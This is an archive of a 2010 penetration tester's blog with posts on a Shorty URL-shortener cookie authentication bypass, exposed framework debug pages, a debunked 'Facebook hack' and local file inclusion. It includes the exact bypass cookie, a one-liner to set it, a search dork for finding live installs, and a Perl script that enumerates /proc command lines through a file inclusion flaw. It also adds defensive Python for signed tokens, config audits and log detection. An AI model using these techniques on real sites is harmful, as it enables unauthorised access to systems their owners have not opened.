Friday 16 April 2010

Shorty Authentication Bypass

(This post was originally published on my personal blog and was also featured on the exploit-db.com website)

Today, while reading around the internet, I found an article about 7 PHP scripts to generate short URLs. This kind of link is very common today, with a lot of controversy about the security risk it implies. I’m not here (now) to discuss URL shortening services but to talk about a stupid bug that I found in the first (!!!) piece of software that WebResourcesDepot recommends today.
Shorty is a very old script… From 2006. Why are they recommending it in the first place? Second: did they try to install it? A lot of errors appear when you try a fresh install, and it takes some pain to fix them. Buggy from scratch.
I then decided to read some source code. I found a bug in functions.php that we can use to bypass the login form. Let's read some PHP code:
function authenticate(){
    $cookie = @$_COOKIE['snickerdoodle'];
    if($cookie == "polarbears"){
        //
    } else {
        exit("Not logged in.");
    }
}

function verify(){
    if(@$_COOKIE['snickerdoodle']){
        $cookie = $_COOKIE['snickerdoodle'];
    } else {
        $cookie = '';
    }
    if($cookie == "polarbears"){
        return 1;
    } else {
        return 0;
    }
}
As you can see, this code uses a cookie with the name “snickerdoodle” and the value “polarbears” to determine whether you are authenticated or not. It's very easy to create a new cookie with this data in your browser using a Firefox extension. If you are using a browser without extensions, like Google Chrome, you can type the following JavaScript statement into the URL bar:
javascript:document.cookie="snickerdoodle=polarbears";
If you don’t want to install Shorty (and mess around with all the hacks you have to do to use it) you can always use the search intitle:"Shorty (Beta)" to find some places to test it.
Have fun!
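
The check above compares the cookie with a constant that is identical for every visitor, so the cookie says nothing about whether a login ever happened. As an added example (not Shorty's code: a Python model with hypothetical function names and a constructed secret), the same constant-cookie check is set beside a server-signed, expiring token that only the login handler can issue:

```python
import hashlib
import hmac
import time

# Constructed for this example: a per-install secret that never leaves the server.
SERVER_SECRET = b"constructed-example-secret"
MAX_AGE = 3600  # seconds a login stays valid


def verify_static(cookie):
    """Model of the check on the page: client input compared with a constant."""
    return cookie == "polarbears"


def sign_payload(payload, secret):
    """HMAC-SHA256 over the payload, hex encoded."""
    return hmac.new(secret, payload.encode(), hashlib.sha256).hexdigest()


def issue_token(user, now=None, secret=SERVER_SECRET):
    """Call only after the password check has succeeded."""
    issued = int(time.time() if now is None else now)
    payload = f"{user}|{issued}"
    return f"{payload}|{sign_payload(payload, secret)}"


def verify_token(cookie, now=None, secret=SERVER_SECRET):
    """Return the user name for a valid, unexpired token, else None."""
    parts = (cookie or "").split("|")
    if len(parts) != 3:
        return None
    user, issued, mac = parts
    expected = sign_payload(f"{user}|{issued}", secret)
    # Constant-time comparison; bytes avoid a TypeError on non-ASCII input.
    if not hmac.compare_digest(mac.encode(), expected.encode()):
        return None
    # The MAC matched, so "issued" is the integer the server wrote itself.
    age = int(time.time() if now is None else now) - int(issued)
    return user if 0 <= age <= MAX_AGE else None
```

In PHP itself the usual equivalent is to keep the login flag in `$_SESSION` on the server, so the browser only holds a random session identifier.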

Wednesday 14 April 2010

The danger of the default files

(This post was originally posted on my own personal blog)
During my current research I have found some default files that some web frameworks include in their installations and that can compromise the security of a website. They can also allow an attacker to determine which framework a web page is using.

The first of these files is from the symfony framework. It offers developers a useful script called frontend_dev.php, which shows internal information about the current install and the server. As you can see in the following screenshot, the information can be very useful…

[Screenshot: symfony debug information]

It’s deactivated by default and can be activated by changing the “lib\config\config\settings.yml” file:
# Logging and debugging settings

web_debug: false # Enable the web debug toolbar
By default the framework is configured not to show the toolbar, but a lot of web pages (indexed by Google) have activated it and allow any user to read the private data of their websites.

[Screenshot: Google results for symfony debug pages]

Other default files that I found while researching the default Zend Server installation are the aliases /server-info and /server-status. These are part of the mod_info module and, fortunately, in Zend Server they are configured to be accessible only from localhost:
<Location /server-info>
SetHandler server-info
Order deny,allow
Deny from all
Allow from 127.0.0.1
</Location>

<Location /server-status>
SetHandler server-status
Order deny,allow
Deny from all
Allow from 127.0.0.1
</Location>

This is a secure default configuration that other sites using this Apache module should adopt for the security of their web pages. This problem was discussed some time ago, when the /server-status page on twitter.com was revealed. It’s also known that other servers, like Apache.org, expose their status and info pages, and you can also find a lot of websites sharing their server-status and server-info pages.
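
One way to check your own Apache configuration for the pattern described above, as an added example (not from Zend Server or the original post): a small Python audit that finds every `<Location>` block with a `server-info` or `server-status` handler and reports whether its access rules admit loopback clients only. The sample configuration is constructed, and the Apache 2.4 `Require` handling goes beyond the 2.2 syntax shown on the page.

```python
import re

LOOPBACK = {"127.0.0.1", "::1", "localhost"}
BLOCK = re.compile(r"<Location\s+([^>]+)>(.*?)</Location>", re.S | re.I)
HANDLER = re.compile(r"^\s*SetHandler\s+(server-(?:info|status))\s*$", re.I | re.M)

# Constructed sample: the page's localhost-only block, an unrestricted block,
# and an Apache 2.4 style block.
SAMPLE_CONF = """
<Location /server-info>
SetHandler server-info
Order deny,allow
Deny from all
Allow from 127.0.0.1
</Location>
<Location /server-status>
SetHandler server-status
</Location>
<Location /status24>
SetHandler server-status
Require local
</Location>
"""


def is_local_only(body):
    """True if the block's access rules admit loopback clients only."""
    rules = [line.split("#")[0].lower().split() for line in body.splitlines()]
    rules = [r for r in rules if r]
    requires = [r[1:] for r in rules if r[0] == "require"]
    if requires:  # Apache 2.4 syntax: Require local / Require ip <loopback>
        return all(r in (["local"], ["all", "denied"])
                   or (r[:1] == ["ip"] and len(r) > 1 and set(r[1:]) <= LOOPBACK)
                   for r in requires)
    # Apache 2.2 syntax, as on the page: Deny from all + Allow from <loopback>
    allows = [r[2:] for r in rules if r[:2] == ["allow", "from"]]
    return ["deny", "from", "all"] in rules and all(
        set(a) <= LOOPBACK for a in allows)


def audit(conf_text):
    """Return (location, handler, local_only) per status/info handler block."""
    findings = []
    for path, body in BLOCK.findall(conf_text):
        match = HANDLER.search(body)
        if match:
            findings.append((path.strip(), match.group(1).lower(),
                             is_local_only(body)))
    return findings
```

Any tuple whose last field is `False` is a handler reachable from outside the host; handlers set outside a `<Location>` block are not covered by this check.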

I have found that these default files are not included in the wordlists of wfuzz or even Wikto. I don’t know why they are ignoring these files, but I’m going to add them to my default dictionary files :)

Cheers!

Monday 12 April 2010

Pentura is Delicious!!!

Well... maybe I made the easy joke, but I couldn't resist!!!

I had never used any kind of bookmarks, even local ones. I try to remember the links, or at least the keywords of the article or post, to be able to locate it later using Bing or Google. But today I changed something in my life... well, at least in my working life :P I'm starting to use bookmarks!

I added a small box on the right of the blog showing the RSS feed of the new delicious account I created for Pentura to store all the links about security I consider interesting around the web. Some of them will be in Spanish (I'm sorry...) but you can easily translate them using online translators :)

I also added my personal twitter account, where you can follow my public timeline with funny security jokes, thoughts about how stupid the bugs I find can sometimes be, and maybe personal stuff between friends around the world. Again, I'll try to keep it in English, but sometimes replies go out in Spanish.

Bye!

Friday 9 April 2010

Web security news and the "Hack of the Year"

It has been a long time since my last post, but I was a bit busy with customer on-site testing. Nice days of application testing, but now it is time to write here again.

Long ago I read a fantastic book about security named "The Art Of Intrusion", written by the (in)famous Kevin Mitnick. He told amazing stories about security and intrusions without giving too many technical details about them, but enough to understand the attack and catch the idea behind the security problem the system had. News about security is (sometimes) the same. I said "sometimes" because reporters who write about security don't usually know anything about security, but this is something for another post...

Today I want to introduce you to two websites about web security / cracking. The first one is a website that intends to collect all the web security incidents around the world. It's called The Web Hacking Incident Database and offers reports of hacked websites around the world, including, in most cases, some technical information. It's worth a read to understand how important web security is nowadays.

The other one is really a clone of the famous milw0rm website (I'm not going to link it because it is currently abandoned) called Inj3ctor. They published a paper a few days ago claiming that they had hacked Facebook. Wooohhh... really? Let's check the report:
  • They start by doing a port scan of facebook.com.
  • After that they do some simple Google search queries trying to identify some PHP errors, because it is well known that Facebook is developed in this language.
  • A quick look into the robots.txt file can point us to specific (and usually private) web pages.
  • After these tests against facebook.com they move to apps.facebook.com and detect some vulnerabilities in third-party applications. These applications are not developed by Facebook and are not hosted on the Facebook servers.
They got a lot of information from MySQL databases using simple SQL injections and claim that the information they obtained is from Facebook. Ok, sometimes people get really excited too soon. In this case they called it: "Hack of the year!".

If you are going to call something the "Hack of the year" be sure it is... Because:
  1. Facebook doesn't use MySQL, they use Cassandra.
  2. The path shown in the PHP errors points clearly to another server (http://tomkincaid.dreamhosters.com/)
  3. Wordpress? I'm pretty sure that there is no Wordpress installation running on the Facebook servers.
  4. Don't say your exploit is the "Hack of the year", wait until the community says it: http://pwnie-awards.org/
That's all for now; more another day, with an exciting project I want to release at some point next week :) Cheers!

Thursday 1 April 2010

Process command line enumeration using LFI

This week during a pentest I discovered a website vulnerable to Local File Inclusion. As I wanted to discover as much information as possible about the system, I decided to retrieve the running processes and the command lines used to execute these programs. With this I intended to discover more services and paths in the system.

I wrote a very simple Perl program that can very easily be modified for other scenarios :)

#!/usr/bin/perl -w
use LWP;

my $browser = LWP::UserAgent->new;
my $url = 'https://URL/load?file=../../proc/';

for($i = 0; $i < 9500; $i++){
    my $response = $browser->get( $url.$i."/cmdline" );
    if($response->content !~ m/^$/i) {
        print $i . " : " . $response->content ."\n";
    }
}
Enjoy!
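
From the defender's side, the enumeration above leaves a distinctive trail in the web server's access log: one client requesting many different /proc/<pid>/cmdline paths through a file parameter. The following added example (not part of the original post; the log lines, addresses and the `proc_probes` name are constructed for illustration) flags such clients in Combined Log Format lines and counts how many probes returned a non-empty body.

```python
import re
from collections import defaultdict
from urllib.parse import unquote

# Combined Log Format: client, request target, status and response size.
LINE = re.compile(
    r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST|HEAD) (\S+) [^"]*" (\d{3}) (\d+|-)')
# Traversal (or an absolute path) into a per-process file under /proc.
PROC = re.compile(r"(?:\.\./|=/)proc/(\d+)/(?:cmdline|environ|status)\b")

# Constructed sample log lines (documentation address ranges).
SAMPLE_LOG = [
    '203.0.113.7 - - [01/Apr/2010:10:00:01 +0000] "GET /load?file=../../proc/1/cmdline HTTP/1.1" 200 24',
    '203.0.113.7 - - [01/Apr/2010:10:00:01 +0000] "GET /load?file=../../proc/2/cmdline HTTP/1.1" 200 0',
    '203.0.113.7 - - [01/Apr/2010:10:00:02 +0000] "GET /load?file=%2e%2e%2f%2e%2e%2fproc%2f3%2fcmdline HTTP/1.1" 200 31',
    '198.51.100.4 - - [01/Apr/2010:10:00:03 +0000] "GET /load?file=report.pdf HTTP/1.1" 200 5120',
    '192.0.2.9 - - [01/Apr/2010:10:00:04 +0000] "GET /load?file=../../proc/1/cmdline HTTP/1.1" 404 0',
]


def proc_probes(log_lines, min_pids=3):
    """Map client -> probed PIDs and leak count, for >= min_pids distinct PIDs."""
    seen = defaultdict(lambda: {"pids": set(), "leaked": 0})
    for line in log_lines:
        m = LINE.match(line)
        if not m:
            continue
        client, target, status, size = m.groups()
        # Decode twice so double URL encoding is caught; normalise backslashes.
        decoded = unquote(unquote(target)).replace("\\", "/")
        hit = PROC.search(decoded)
        if not hit:
            continue
        entry = seen[client]
        entry["pids"].add(int(hit.group(1)))
        # A 200 with a non-empty body means process data was actually served.
        if status == "200" and size not in ("-", "0"):
            entry["leaked"] += 1
    return {client: {"pids": sorted(e["pids"]), "leaked": e["leaked"]}
            for client, e in seen.items() if len(e["pids"]) >= min_pids}
```

A non-zero `leaked` count tells the responder that the inclusion bug returned real process data, which sets the scope of what has to be treated as disclosed.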